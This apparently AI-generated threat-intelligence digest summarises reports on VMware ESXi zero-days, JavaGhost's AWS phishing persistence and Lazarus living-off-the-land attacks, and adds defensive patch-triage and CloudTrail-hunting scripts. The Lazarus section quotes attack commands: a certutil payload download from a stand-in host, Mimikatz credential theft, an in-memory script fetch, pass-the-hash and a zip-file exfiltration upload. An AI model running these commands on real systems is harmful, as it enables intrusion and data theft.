The Feed 2025-03-05
AI Generated Podcast
https://open.spotify.com/episode/27Kpu4MB0AtviKgGKvQ35t?si=H9X_TBpHR2iCImBJ7AnZag
Summarized Sources
- Broadcom fixes three VMware zero-days exploited in attacks : Broadcom has released patches for three actively exploited zero-day vulnerabilities in multiple VMware ESX products that could allow attackers with administrator or root access in a compromised virtual machine to escape the sandbox and gain access to the hypervisor.
- JavaGhost’s Persistent Phishing Attacks From the Cloud : The threat actor group JavaGhost has been observed conducting persistent phishing attacks targeting cloud environments, specifically AWS, by leveraging misconfigurations and exposed credentials to send phishing emails and establish long-term persistence.
- Living off the Land (LOTL) attacks: How North Korea’s Lazarus Group Hackers Exploited Windows : The Lazarus Group, linked to North Korea, conducted Living Off the Land (LOTL) attacks against developers and Web3 organizations by using legitimate Windows tools to install malware, escalate privileges, steal credentials, and exfiltrate data.
- Silk Typhoon targeting IT supply chain : Microsoft Threat Intelligence has identified the Chinese espionage group Silk Typhoon targeting IT supply chain companies and cloud applications using stolen API keys and compromised credentials to access downstream customers for espionage purposes.
- Zhong Stealer: Technical Analysis of a Threat Targeting Fintech : A new stealer malware named Zhong Stealer has been identified targeting the cryptocurrency and fintech sectors through social engineering on chat support platforms, enabling data theft and establishing persistence on compromised systems.
Broadcom fixes three VMware zero-days exploited in attacks
Summary
Broadcom has issued a warning to customers regarding three actively exploited zero-day vulnerabilities (CVE-2025-22224, CVE-2025-22225, and CVE-2025-22226) affecting various VMware ESX products, including ESXi, vSphere, Workstation, Fusion, Cloud Foundation, and Telco Cloud Platform. These vulnerabilities were discovered and reported by the Microsoft Threat Intelligence Center. Successful exploitation by an attacker with privileged administrator or root access within a compromised virtual machine could lead to escaping the virtual machine’s sandbox and gaining access to the hypervisor. Broadcom has evidence suggesting these vulnerabilities have been exploited in the wild, and patches were released on March 4, 2025, to address these issues. The exploitation of these flaws allows attackers to execute code on the host or leak information from the host process. Once the hypervisor is compromised, attackers can access VM data, ESX configurations, and mounted storage, potentially traversing the entire VMware environment. The article emphasizes that patching alone might not be sufficient and recommends conducting a compromise assessment.
Technical Details
The article details three distinct vulnerabilities:
- CVE-2025-22224: This is a critical heap overflow vulnerability with a CVSS score of 9.3. It is caused by a Time-of-Check Time-of-Use (TOCTOU) issue, leading to an out-of-bounds write. An attacker with local administrative privileges on a virtual machine can exploit this to execute code as the virtual machine executable (VMX) process running on the host. This vulnerability affects VMware ESXi 7.0 and 8.0, VMware Workstation 17.x, VMware Cloud Foundation 4.5.x, and various versions of VMware Telco Cloud Platform and Infrastructure.
- CVE-2025-22225: This is an arbitrary write vulnerability rated as important with a CVSS score of 8.2. An attacker who has already gained code execution within the VMX process (for example, by exploiting CVE-2025-22224) can leverage this vulnerability to perform an arbitrary kernel write, resulting in a sandbox escape. This vulnerability impacts VMware ESXi 7.0 and 8.0, VMware Cloud Foundation 4.5.x, and various versions of VMware Telco Cloud Platform and Infrastructure.
- CVE-2025-22226: This is an information disclosure vulnerability rated as important with a CVSS score of 7.1. It stems from an out-of-bounds read in Host Guest File Sharing (HGFS), a VMware feature for file sharing between the guest VM and the host. An attacker with administrative privileges within the virtual machine can exploit this to leak memory from the VMX process. This vulnerability affects VMware ESXi 7.0 and 8.0, VMware Workstation 17.x, VMware Fusion 13.x, VMware Cloud Foundation 4.5.x, and various versions of VMware Telco Cloud Platform and Infrastructure.
The chaining of these vulnerabilities is significant. An attacker might first compromise a guest operating system and gain administrator or root access. Subsequently, they could exploit the critical heap overflow (CVE-2025-22224) to execute code as the VMX process. Following this, the arbitrary write vulnerability (CVE-2025-22225) can be exploited from within the VMX process to achieve a hypervisor escape by writing to the kernel. The information disclosure vulnerability (CVE-2025-22226) can be used by an attacker with administrative privileges on a VM to leak memory from the VMX process.
Once an attacker gains access to the ESX server, they have access to everything on it, including virtual machine data, ESX configuration, and mounted storage. This access to ESX configuration and network storage allows lateral movement within the VMware environment. The article highlights the risk this poses, especially in environments using vMotion, where VMs can move across ESX hosts, giving attackers access to storage of VMs both on the compromised host and others. Furthermore, ESXi’s nature as a “black box” environment lacking traditional EDR tools and monitoring means that a hypervisor escape places the attacker outside of typical security controls, enabling actions like accessing Active Directory databases or deleting data without triggering alerts. This significantly elevates the risk compared to a compromise within a single virtual machine. The impact is also amplified for managed VMware providers and companies with private clouds, as a compromise of one VM could potentially lead to the compromise of every other customer VM or business unit VM respectively.
Industries
The article does not explicitly mention any specific targeted industries, but it highlights the broad impact on organizations using VMware products, including enterprises, managed service providers and the SMBs that buy managed VMs from them, and companies running private clouds. The mention of Telco Cloud Platform and Infrastructure suggests a particular concern for the telecommunications industry. The reference to ransomware incidents that frequently target ESX or vCenter servers indicates that any organization relying heavily on virtualized infrastructure is at risk.
Recommendations
The article provides the following recommendations:
- Patch immediately: Customers who have not applied the updates released on March 4, 2025, are strongly urged to do so for all affected VMware products.
- Enforce multifactor authentication (MFA) on all accounts: This includes removing users excluded from MFA and strictly requiring it from all devices and locations.
- Enable passwordless authentication methods: For accounts that support it, use methods like Windows Hello, FIDO keys, or Microsoft Authenticator. For password-requiring accounts, use authenticator apps for MFA.
- Isolate privileged accounts from productivity accounts: This helps protect administrative access to the environment.
- Identify and protect critical assets: Focus on ESXi hypervisors by ensuring they have the latest security updates, proper monitoring procedures, and backup and recovery plans.
- Deploy authenticated scans of network devices using SNMP through Microsoft Defender portal: This can help identify vulnerabilities in network devices like ESXi and provide security recommendations.
- Turn on attack surface reduction rules: Specifically, enable the rule to “Block abuse of exploited vulnerable signed drivers”. Assess the potential impact of this rule before enabling it in blocking mode.
- Perform a compromise assessment: Given that these were actively exploited zero-day vulnerabilities, it is crucial to investigate if attackers have already gained a foothold in the environment. This involves checking for signs of intrusion, stolen data, hidden backdoors, or other malicious activities.
Hunting methods
The article notes that, at the time of writing, the "Endpoints exposure" tab of the Microsoft Defender Vulnerability Management report did not surface devices vulnerable to these specific CVEs. It instead recommends authenticated SNMP scans of network devices through the Microsoft Defender portal to identify vulnerable ESXi hosts.
The article also emphasizes the need for a compromise assessment to actively search for indicators of compromise, going beyond simply patching. Specific hunting queries or methods are not detailed in the provided excerpts, but the recommendation highlights the importance of proactive threat hunting activities following the disclosure of actively exploited zero-day vulnerabilities.
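Since the article gives no concrete hunting query, the first practical check is simply whether every host in the fleet is on a fixed build. The script below is an added example (not from the article or from Broadcom): it parses the text that esxcli system version get prints on a host, collected however you reach your hosts, and compares the release build against a per-branch minimum. The build numbers in FIXED_BUILDS are this example's assumptions and must be confirmed against the Broadcom advisory before a verdict is trusted; the sample output is constructed.

```python
"""Fleet triage for the March 4, 2025 VMware ESXi fixes (CVE-2025-22224/22225/22226).

Added example, not from the article or from Broadcom. It parses the text that
`esxcli system version get` prints on each host (collected via SSH, vCenter, or
pasted by hand) and compares the release build to a per-branch minimum. The
minimum builds in FIXED_BUILDS are this example's assumptions: check them
against the Broadcom advisory before trusting a verdict.
"""
import re
from dataclasses import dataclass

# ASSUMED minimum fixed build per ESXi branch, keyed by the esxcli "Version"
# field. Verify against the Broadcom advisory; a host on a branch not listed
# here is reported as unknown rather than guessed.
FIXED_BUILDS = {
    "7.0.3": 24585291,  # ESXi 7.0 Update 3s (assumed)
    "8.0.2": 24585300,  # ESXi 8.0 Update 2d (assumed)
    "8.0.3": 24585383,  # ESXi 8.0 Update 3d (assumed)
}

_FIELD = re.compile(r"^\s*(Product|Version|Build|Update|Patch):\s*(.+?)\s*$", re.M)
_BUILD = re.compile(r"(\d+)\s*$")  # "Releasebuild-24585383" -> 24585383


@dataclass(frozen=True)
class HostVersion:
    host: str
    version: str  # e.g. "8.0.3"
    build: int    # numeric release build


def parse_esxcli_version(host: str, text: str) -> HostVersion:
    """Turn the output of `esxcli system version get` into a HostVersion."""
    fields = dict(_FIELD.findall(text))
    if fields.get("Product") != "VMware ESXi":
        raise ValueError(f"{host}: not ESXi output: {fields.get('Product')!r}")
    m = _BUILD.search(fields.get("Build", ""))
    if not m:
        raise ValueError(f"{host}: unrecognised Build field {fields.get('Build')!r}")
    return HostVersion(host=host, version=fields["Version"], build=int(m.group(1)))


def assess(hv: HostVersion) -> str:
    """'patched', 'vulnerable' or 'unknown-branch' for one host.

    Build numbers are only comparable within a branch, so the lookup is by
    Version; a higher build on a different branch proves nothing.
    """
    minimum = FIXED_BUILDS.get(hv.version)
    if minimum is None:
        return "unknown-branch"
    return "patched" if hv.build >= minimum else "vulnerable"


def triage(outputs: dict) -> dict:
    """Map host name -> verdict for a {host: esxcli_output} collection."""
    return {host: assess(parse_esxcli_version(host, text)) for host, text in outputs.items()}


# Constructed sample output (not a real inventory).
SAMPLE_OUTPUT = {
    "esx01": "   Product: VMware ESXi\n   Version: 8.0.3\n   Build: Releasebuild-24585383\n   Update: 3\n",
    "esx02": "   Product: VMware ESXi\n   Version: 8.0.3\n   Build: Releasebuild-24414501\n   Update: 3\n",
    "esx03": "   Product: VMware ESXi\n   Version: 7.0.3\n   Build: Releasebuild-23794027\n   Update: 3\n",
    "esx04": "   Product: VMware ESXi\n   Version: 8.0.0\n   Build: Releasebuild-20513097\n   Update: 0\n",
}

if __name__ == "__main__":
    for host, verdict in triage(SAMPLE_OUTPUT).items():
        print(f"{host}: {verdict}")
```

A host reported as unknown-branch is not a pass: it is on a release line the table does not cover and needs a manual look at the advisory. Being on a fixed build also says nothing about whether the host was exploited before patching, which is why the compromise assessment above still applies.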
Original link: https://www.bleepingcomputer.com/news/security/broadcom-fixes-three-vmware-zero-days-exploited-in-attacks/
JavaGhost’s Persistent Phishing Attacks From the Cloud
Summary
The threat actor group JavaGhost has been active for over five years and has shifted from website defacement to persistent phishing attacks targeting cloud environments, specifically Amazon Web Services (AWS). Between 2022 and 2024, they have been observed leveraging misconfigurations in victim organizations’ AWS environments that expose long-term access keys to initiate phishing campaigns for financial gain. JavaGhost does not exploit AWS vulnerabilities but rather abuses exposed credentials to use services like Amazon Simple Email Service (SES) and WorkMail to send phishing emails and establish long-term persistence within compromised accounts. They have also adopted advanced defense evasion techniques, similar to those used by Scattered Spider, to cover their tracks within CloudTrail logs. Despite their sophistication, all JavaGhost activities leave a detectable logging footprint. Palo Alto Networks customers are better protected through Cortex Cloud and Cortex XSIAM.
Technical Details
JavaGhost gains initial access to AWS environments by obtaining exposed long-term access keys associated with Identity and Access Management (IAM) users. These keys are likely obtained through various exposure methods not detailed in this report. Upon gaining access via the command-line interface (CLI), the threat actors do not make the common GetCallerIdentity API call, which helps them evade detection. Instead, their initial API calls are GetServiceQuota, GetSendQuota, and GetAccount, which confirm their access and gather information about SES capabilities.
To gain easier visibility and further obfuscate their identity, JavaGhost generates temporary credentials and a console login URL using the compromised long-term access keys. This process involves multiple steps that can be scripted. First, they use the GetFederationToken API within the AWS Security Token Service (STS) to create temporary credentials (sessionId, sessionKey, sessionToken). This API call requires a name for the federated user, a session policy, and a duration. JavaGhost uses an "allow all" inline policy to maximize their permissions, although the effective permissions are capped by the underlying IAM user's permissions. They opt for GetFederationToken over AssumeRole for generating these temporary credentials.
Next, they generate an encoded URL using Python's urllib library. The user agent recorded on GetSigninToken events in CloudTrail is Python-urllib/3.10, the default user agent of the standard-library urllib (the number is the Python version), which confirms the scripted flow. Finally, a GetSigninToken request is made with the encoded URL to obtain the token needed to build the AWS console login URL for the federated user. The generated login URL is valid for 15 minutes by default; the console session it opens lasts for the duration requested in the GetFederationToken call. Unlike sessions created with IAM roles, these federated sessions cannot be easily revoked: an IAM policy must be attached directly to the user to block actions. Attaching the AWS managed AWSDenyAll policy invalidates all of the user's permissions but does not terminate an active console session.
To set up their phishing infrastructure, JavaGhost utilizes SES and WorkMail. They begin by creating various SES email identities (both email addresses and domains), which are logged as CreateEmailIdentity events in CloudTrail. They then configure DomainKeys Identified Mail (DKIM) settings, typically during the identity creation process, resulting in PutEmailIdentityDkimAttributes events. The threat actor group also modifies the SES Virtual Deliverability Manager (VDM) and Mail-from attributes, generating PutEmailIdentityMailFromAttributes and PutAccountVdmAttributes events.
In addition to SES, JavaGhost configures an AWS WorkMail Organization and adds WorkMail users. Creating a WorkMail Organization (CreateOrganization event) triggers numerous SES and AWS Directory Service (DS) events, including AuthorizeApplication, CreateAlias, and CreateIdentityPoolDirectory if a new WorkMail directory is created. Subsequently, they create WorkMail users (CreateUser event with workmail.amazonaws[.]com as the event source), who are automatically registered to WorkMail (RegisterToWorkMail event).
Before sending phishing emails, JavaGhost creates new SMTP credentials. Notably, they do not change the default username, so all new SMTP usernames start with ses-smtp-user.* . Creating these credentials generates a new IAM user with the SMTP username (which also appears as an access key), and if the AWS account has not used SES historically, a new IAM user group named AWSSESSendingGroupDoNotRename is created with an inline policy allowing only ses:SendRawEmail. These actions are logged as CreateGroup and PutGroupPolicy events. If the group already exists, the new user is simply added to it (AddUserToGroup event).
For long-term persistence, JavaGhost creates various IAM users, some used in attacks and others seemingly left dormant. These unused users serve as backdoors, with access confirmed via console logins but no other immediate actions taken. The IAM users have varied names, some attempting to blend in. All newly created persistent IAM users have the AWS managed AdministratorAccess policy attached, granting them full permissions within the AWS account, as well as console access. These IAM activities are logged as CreateUser, AttachUserPolicy, and CreateLoginProfile events.
In a shift observed in 2024, JavaGhost began using an IAM role to access victim AWS accounts from a threat actor-controlled AWS account. This involves creating a new IAM role with a trust policy that allows access from the attacker's AWS account (CreateRole event). This new role is also granted unlimited permissions by attaching the AdministratorAccess policy (AttachRolePolicy event). When the attacker assumes this role, it is recorded as two simultaneous CloudTrail events: AssumeRole and SwitchRole.
JavaGhost also leaves a consistent calling card by creating new Amazon EC2 security groups named Java_Ghost with the description "We Are There But Not Visible" (CreateSecurityGroup event). These security groups typically contain no rules and have no attached resources. The description matches the group's slogan on a historical website.
Additional suspicious activities include attempting to leave the AWS Organization (LeaveOrganization event), which would remove any Service Control Policies (SCPs) the organization applies to the account. They also enable all AWS regions that are not enabled by default (EnableRegion event), likely to evade security controls and monitoring that are scoped to specific regions.
Countries
The article does not explicitly mention any targeted countries. The Indonesian text found on one of their historical websites (“stop blaming everything”) and potentially in resource naming suggests a possible link to Indonesia, but this does not confirm targeting of specific countries.
Industries
The article does not explicitly mention any specific targeted industries, but it indicates that JavaGhost targets cloud environments, specifically organizations using AWS. The nature of phishing attacks suggests a broad targeting scope aiming at unsuspecting individuals within various organizations for financial gain.
Recommendations
The article provides the following recommendations:
- Limit access to administrative rights.
- Rotate IAM credentials regularly.
- Use short term/just-in-time (JIT) access tokens.
- Enable multi-factor authentication (MFA).
- Leverage Cloud security posture management (CSPM) capabilities in Cortex Cloud to assist with creating appropriate rules.
- Contact the Unit 42 Incident Response team if a compromise is suspected.
Hunting methods
The article provides the following Cortex XQL Queries for hunting, investigation, and detection of potentially malicious operations:
- Authentication:
dataset = amazon_aws_raw | filter (eventSource = "sts.amazonaws.com" and eventName = "GetFederationToken") or (eventSource = "signin.amazonaws.com" and eventName = "GetSigninToken")
dataset = amazon_aws_raw | filter (eventSource = "sts.amazonaws.com" and eventName = "AssumeRole") or (eventSource = "signin.amazonaws.com" and eventName = "SwitchRole")
- SES:
dataset = amazon_aws_raw | filter (eventSource = "ses.amazonaws.com" and eventName = "CreateEmailIdentity") or (eventSource = "iam.amazonaws.com" and eventName in ("CreateUser", "CreateAccessKey", "AddUserToGroup"))
- WorkMail:
dataset = amazon_aws_raw | filter eventSource = "workmail.amazonaws.com" and eventName in ("CreateUser", "CreateOrganization")
- EC2 Security Group:
dataset = amazon_aws_raw | alter groupName = json_extract_scalar(requestParameters, "$.groupName") | alter groupDescription = json_extract_scalar(requestParameters, "$.groupDescription") | filter eventSource = "ec2.amazonaws.com" and eventName = "CreateSecurityGroup" | filter groupName = "Java_Ghost" and groupDescription = "We Are There But Not Visible"
Palo Alto Networks Cortex Cloud and Cortex XSIAM alert on the following activities:
- IAM actions such as new user creations, attaching of the AdministratorAccess policy, GetFederationToken, and GetSigninToken.
- Suspicious sending of emails through Simple Email Service (SES).
- Use of getgroup and putgroup in CloudTrail.
- XSIAM also detects behavioral actions from cloud and on-premises endpoints that suggest the collection of AWS IAM credentials.
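The technical details and the XQL queries above describe the same footprint from two sides; the script below is an added example (not from the Unit 42 report) that implements those detections in plain Python over CloudTrail records, so they can be run against an exported log or a SIEM without XQL. It covers the GetFederationToken/GetSigninToken console flow (with the Python-urllib user agent called out), a CreateRole whose trust policy names a foreign account, ses-smtp-user.* IAM user creation and the AWSSESSendingGroupDoNotRename group, AdministratorAccess attachment, the Java_Ghost security group, LeaveOrganization and EnableRegion. The records in SAMPLE_EVENTS are constructed: the account IDs, names, region and user agents are made up, and only the CloudTrail fields the rules read are present.

```python
"""Hunt CloudTrail records for the JavaGhost tradecraft described above.

Added example, not from the Unit 42 report. The field names follow the
CloudTrail record format (eventSource, eventName, userAgent,
recipientAccountId, requestParameters); the sample records are constructed.
"""
import json
import re
from urllib.parse import quote, unquote

VICTIM_ACCOUNT = "111122223333"    # constructed
ATTACKER_ACCOUNT = "999988887777"  # constructed


def _principal_accounts(policy_doc: str) -> set:
    """Account IDs named in a CreateRole trust policy.

    CloudTrail stores assumeRolePolicyDocument URL-encoded, so decode first.
    A wildcard principal is returned as "*" so it also counts as foreign.
    """
    doc = json.loads(unquote(policy_doc))
    accounts = set()
    for stmt in doc.get("Statement", []):
        principal = stmt.get("Principal", {})
        aws = principal.get("AWS", []) if isinstance(principal, dict) else principal
        for p in ([aws] if isinstance(aws, str) else aws):
            m = re.search(r"\d{12}", p)
            accounts.add(m.group(0) if m else p)
    return accounts


def classify(ev: dict):
    """Return a rule name if one CloudTrail record matches a JavaGhost TTP, else None."""
    src, name = ev["eventSource"], ev["eventName"]
    rp = ev.get("requestParameters") or {}
    ua = ev.get("userAgent", "")
    if (src, name) in {("sts.amazonaws.com", "GetFederationToken"),
                       ("signin.amazonaws.com", "GetSigninToken")}:
        # The report ties Python-urllib on GetSigninToken to the scripted console flow.
        return "console-federation-urllib" if ua.startswith("Python-urllib") else "console-federation"
    if src == "iam.amazonaws.com":
        if name == "CreateRole" and rp.get("assumeRolePolicyDocument"):
            foreign = _principal_accounts(rp["assumeRolePolicyDocument"]) - {ev["recipientAccountId"]}
            if foreign:
                return "cross-account-trust"
        if name == "CreateUser" and rp.get("userName", "").startswith("ses-smtp-user."):
            return "ses-smtp-user"
        if name in ("AttachUserPolicy", "AttachRolePolicy") and \
                rp.get("policyArn", "").endswith("/AdministratorAccess"):
            return "admin-policy-attached"
        if name == "AddUserToGroup" and rp.get("groupName") == "AWSSESSendingGroupDoNotRename":
            return "ses-sending-group"
    if src == "ses.amazonaws.com" and name == "CreateEmailIdentity":
        return "ses-identity"
    if src == "workmail.amazonaws.com" and name in ("CreateOrganization", "CreateUser"):
        return "workmail-setup"
    if src == "ec2.amazonaws.com" and name == "CreateSecurityGroup" and rp.get("groupName") == "Java_Ghost":
        return "javaghost-calling-card"
    if src == "organizations.amazonaws.com" and name == "LeaveOrganization":
        return "scp-escape"
    if src == "account.amazonaws.com" and name == "EnableRegion":
        return "region-enable"
    return None


def hunt(events):
    """(eventName, rule) for every matching record; unmatched records drop out."""
    return [(ev["eventName"], rule) for ev in events if (rule := classify(ev)) is not None]


def _ev(source, event_name, ua="aws-cli/2.22.2", **params):
    """Minimal constructed CloudTrail record with only the fields the rules read."""
    return {"eventSource": source, "eventName": event_name, "userAgent": ua,
            "recipientAccountId": VICTIM_ACCOUNT, "requestParameters": params or None}


# Trust policy that lets the attacker's account assume the new role (constructed).
_TRUST = {"Version": "2012-10-17", "Statement": [{"Effect": "Allow", "Action": "sts:AssumeRole",
          "Principal": {"AWS": f"arn:aws:iam::{ATTACKER_ACCOUNT}:root"}}]}

SAMPLE_EVENTS = [  # constructed log fragment, in the order the report describes
    _ev("sts.amazonaws.com", "GetCallerIdentity"),  # ordinary admin noise, not flagged
    _ev("sts.amazonaws.com", "GetFederationToken", name="dev", durationSeconds=43200),
    _ev("signin.amazonaws.com", "GetSigninToken", ua="Python-urllib/3.10"),
    _ev("iam.amazonaws.com", "CreateRole", roleName="support",
        assumeRolePolicyDocument=quote(json.dumps(_TRUST))),
    _ev("iam.amazonaws.com", "AttachRolePolicy", roleName="support",
        policyArn="arn:aws:iam::aws:policy/AdministratorAccess"),
    _ev("iam.amazonaws.com", "CreateUser", userName="ses-smtp-user.20240915-101500"),
    _ev("iam.amazonaws.com", "AddUserToGroup", userName="ses-smtp-user.20240915-101500",
        groupName="AWSSESSendingGroupDoNotRename"),
    _ev("ec2.amazonaws.com", "CreateSecurityGroup", groupName="Java_Ghost",
        groupDescription="We Are There But Not Visible"),
    _ev("organizations.amazonaws.com", "LeaveOrganization"),
    _ev("account.amazonaws.com", "EnableRegion", regionName="ap-east-1"),
    _ev("ec2.amazonaws.com", "DescribeInstances"),  # not flagged
]

if __name__ == "__main__":
    for event_name, rule in hunt(SAMPLE_EVENTS):
        print(f"{rule:28} {event_name}")
```

The cross-account-trust rule is the one worth keeping even outside a JavaGhost hunt: any CreateRole whose trust policy names an account other than the one the event was recorded in is a standing backdoor until someone reviews it. GetFederationToken itself is legitimate in some shops, so treat that rule as a lead to tie to the user agent and to the subsequent IAM activity rather than as an alert on its own.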
IOC
User Agents:
aws-cli/1.18.69 Python/3.8.10 Linux/5.4.0-113-generic botocore/1.16.19
aws-cli/1.19.112 Python/2.7.18 Linux/5.4.0-42-generic botocore/1.20.112
aws-cli/1.22.23 Python/3.6.0 Windows/10 botocore/1.23.23
aws-cli/1.22.97 Python/3.6.0 Windows/10 botocore/1.24.42
aws-cli/1.25.62 Python/3.8.13 Linux/5.15.0-46-generic botocore/1.27.61
aws-cli/1.34.14 md/Botocore#1.35.14 ua/2.0 os/windows#10 md/arch#amd64 lang/python#3.10.8 md/pyimpl#CPython cfg/retry-mode#legacy botocore/1.35.14
aws-cli/1.34.28 md/Botocore#1.35.28 ua/2.0 os/linux#5.15.153.1-microsoft-standard-WSL2 md/arch#x86_64 lang/python#3.12.3 md/pyimpl#CPython cfg/retry-mode#legacy botocore/1.35.28
aws-cli/2.13.18 Python/3.11.5 Linux/5.4.0-163-generic exe/x86_64.ubuntu.20 prompt/off command/*
aws-cli/2.17.18 md/awscrt#0.20.11 ua/2.0 os/linux#6.8.0-36-generic md/arch#x86_64 lang/python#3.11.9 md/pyimpl#CPython cfg/retry-mode#standard md/installer#exe md/distrib#ubuntu.24 md/prompt#off md/command#*
aws-cli/2.22.2 md/awscrt#0.22.0 ua/2.0 os/windows#2019Server md/arch#amd64 lang/python#3.12.6 md/pyimpl#CPython cfg/retry-mode#standard md/installer#exe md/prompt#off md/command#*
aws-cli/2.2.16 Python/3.8.8 Linux/3.10.0-1160.31.1.el7.x86_64 exe/x86_64.centos.7 prompt/off command/*
aws-internal/3 aws-sdk-java/1.12.769 Linux/5.10.224-190.876.amzn2int.x86_64 OpenJDK_64-Bit_Server_VM/17.0.12+8-LTS java/1.8.0_422 vendor/N/A cfg/retry-mode/standard
aws-internal/3 aws-sdk-java/1.12.769 Linux/5.10.225-191.878.amzn2int.x86_64 OpenJDK_64-Bit_Server_VM/17.0.12+8-LTS java/1.8.0_422 vendor/N/A cfg/retry-mode/standard
Boto3/1.24.61 Python/3.8.10 Linux/5.4.0-42-generic Botocore/1.27.61
Boto3/1.35.28 md/Botocore#1.35.28 ua/2.0 os/linux#5.15.153.1-microsoft-standard-WSL2 md/arch#x86_64 lang/python#3.12.3 md/pyimpl#CPython cfg/retry-mode#legacy Botocore/1.35.28
Boto3/1.35.3 md/Botocore#1.35.14 ua/2.0 os/windows#10 md/arch#amd64 lang/python#3.10.8 md/pyimpl#CPython cfg/retry-mode#legacy Botocore/1.35.14
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 OPR/113.0.0.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Edg/128.0.0.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Python-urllib/3.10
IAM Usernames (for persistence):
adminuserdevs
develops
Gh0st_808
Gh0st_365
rootdev
ses2
warkopi
EC2 Security Group Name:
Java_Ghost
EC2 Security Group Description:
We Are There But Not Visible
IAM User Group Name (default for SES SMTP users):
AWSSESSendingGroupDoNotRename
IP Addresses: The article mentions that Unit 42 has consolidated the IP addresses of the referenced group in their GitHub repository, but the specific IP addresses are not included in the provided excerpts.
Domains and File Hashes: No specific domains or file hashes are mentioned in the provided excerpts.
Original link: https://unit42.paloaltonetworks.com/javaghost-cloud-phishing/
Living off the Land (LOTL) attacks: How North Korea’s Lazarus Group Hackers Exploited Windows
Summary
In November 2024, the Lazarus Group, a North Korean threat actor, conducted Living Off The Land (LOTL) attacks targeting developers and Web3 organizations across Europe. The attack involved the use of trojanized open-source software hosted on GitHub, which, once downloaded and executed, leveraged built-in Windows tools like certutil.exe and mshta.exe to evade traditional cybersecurity defenses. This allowed the attackers to gain unauthorized access, escalate privileges, steal credentials using tools like Mimikatz, and exfiltrate sensitive data, including financial assets and proprietary technologies. The attack aimed to steal financial assets and intellectual property, causing operational disruption to the affected organizations. The primary method relied on stealth, utilizing legitimate Windows utilities and processes, making detection by signature-based antivirus solutions challenging. The attack's scale was confirmed by security firms in January 2025, highlighting the severe impact once the Lazarus Group established a foothold within the targeted networks.
Technical Details
The Lazarus Group executed this LOTL attack in a multi-stage process, focusing on stealth and the abuse of legitimate system functionalities.
Initial Access: The attack began with the creation of a fake GitHub repository hosting a trojanized version of a popular open-source tool. Developers and Web3 organizations in Europe unknowingly downloaded and installed this infected software due to GitHub being a trusted platform. The initial malware was designed to bypass antivirus detection by masquerading as a legitimate working tool.
Persistence: Once executed, the malware established persistence using built-in Windows utilities:
- CertUtil abuse: the legitimate certutil.exe tool, intended for certificate management, was misused to download the next-stage payload from a malicious server. The command certutil -urlcache -split -f http://malicious.com/payload.exe C:\Windows\Temp\payload.exe was executed silently to download and store the subsequent payload without triggering antivirus alerts.
- Scheduled tasks and registry Run keys: the attackers created background tasks so that malicious scripts would run automatically without further user interaction. The schtasks command was used to create a scheduled task disguised as a legitimate Windows Update process: schtasks /create /tn "WindowsUpdate" /tr "powershell.exe -ExecutionPolicy Bypass -File C:\Windows\Temp\payload.ps1" /sc minute /mo 30. The -ExecutionPolicy Bypass parameter lets PowerShell run the malicious payload (payload.ps1) from the temporary directory every 30 minutes regardless of the configured script execution policy.
Privilege Escalation: After gaining an initial foothold, the attackers aimed to obtain administrator-level control to access more sensitive parts of the system:
- PowerShell Exploits: PowerShell was used to execute commands without typical security restrictions, likely leveraging known vulnerabilities or misconfigurations.
- DLL Hijacking: Malicious Dynamic Link Library (DLL) files were used to replace legitimate ones, likely facilitated by PowerShell, allowing the execution of malicious code under the context of trusted processes.
- Token manipulation: the attackers employed Mimikatz, a well-known credential-theft tool, to steal security tokens and impersonate administrator users, running Invoke-Mimikatz -Command ' "privilege::debug" "sekurlsa::tokens" ' within PowerShell. The "privilege::debug" command enables SeDebugPrivilege for the process, and "sekurlsa::tokens" extracts security tokens from the Local Security Authority Subsystem Service (LSASS) process.
Credential Access: With elevated privileges, the attackers focused on obtaining login credentials for lateral movement:
- Mimikatz executed in memory: to avoid dropping the mimikatz.exe executable on disk, the attackers downloaded and executed Mimikatz directly in memory with PowerShell. The command Invoke-Expression (IEX (New-Object Net.WebClient).DownloadString("https://github.com/gentilkiwi/mimikatz/raw/master/mimikatz.ps1")) downloads a Mimikatz PowerShell script from a GitHub repository and executes it immediately in memory.
- Pass-the-hash attack: stolen NTLM hashes were used to authenticate to other machines on the network without the cleartext passwords. The article suggests a psexec-style tool facilitated this lateral movement with the command format psexec \\victim1-pc -u admin -H aad3b435b51404eeaad3b435b51404ee -c cmd.exe, where -H supplies the NTLM hash (the value shown is the well-known empty LM hash, so the command is illustrative rather than a captured credential).
Data Exfiltration: Once they had control over the network, the attackers exfiltrated sensitive information while attempting to evade detection:
- Data compression and encryption: files were compressed in PowerShell (for example Compress-Archive -Path C:\stolen_data\* -DestinationPath C:\Windows\Temp\file.zip) and likely encrypted to make detection and analysis more difficult during transit.
- Exfiltration over HTTPS: stolen files were uploaded to legitimate cloud storage services like OneDrive, disguising the traffic as normal file backups. The article illustrates the technique with the PowerShell command Invoke-WebRequest -Uri "https://onedrive.com/upload" -Method POST -InFile "C:\Windows\Temp\file.zip".
The success of these attacks relied heavily on the stealthy nature of LOTL techniques, blending malicious activity with legitimate system processes, which often allowed them to bypass traditional signature-based security solutions like Windows Defender.
Countries
Europe (where the targeted developers and Web3 organizations were located). The article attributes the C2 servers to North Korea.
Industries
Software developers; Web3 organizations.
Recommendations
The article provides the following technical recommendations to minimize the risk of LOTL attacks:
